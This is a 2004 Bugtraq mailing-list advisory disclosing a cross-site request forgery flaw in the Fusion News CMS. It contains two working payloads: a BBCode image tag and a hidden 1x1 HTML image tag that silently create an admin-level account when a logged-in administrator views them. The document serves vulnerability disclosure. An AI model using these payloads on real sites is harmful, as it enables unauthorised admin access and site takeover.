[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Fusion News Yet Another Unauthorized Account Addition Vulnerability
From:       Joseph Moniz <r3d_5pik3 () yahoo ! com>
Date:       2004-07-29 22:52:24
Message-ID: 20040729225224.24449.qmail () www ! securityfocus ! com
[Download RAW message or body]



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product:  Fusion News
vendor: FusionPHP (fusionphp.net)
Affected Versions:  3.6.1 and lower
Description:  A widely used news management system
Vulnerabilities:  Unauthorized Account Addition Vulnerability
Date:  July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)

Ok this is basicly all due to the vendor being really lazy and not SUFFEICENTLY \
patching the previous similar exploit. Basicly all the vendor did to stop the last \
vulnrability was make it so you had to be signd on as an admin to creat an account, \
and that is simply just not enough.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)

Unlike the previous related vulnrability this one you cant simply type something into \
the url bar and press enter. All you have to do is make sure the admin is logged on \
then do one of the following. (the first is probably the most reliable for an \
attacker) 1.)Leave them a comment with an [img] bbcode set like this

[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1[/img]


2.)As long as the admin has RECENTLY logged on you could exploit it remotely. By \
convincing him to go to a site that has a malicious <img> tag such as the following

<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&usern \
ame=teh-r3d-1&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1" \
size="1" width="1">

That would make a 1x1 pixel image meaning the admin wouldnt even know what happend.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)

Give me 5 seconds to press the send button to the vendor ;)

-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic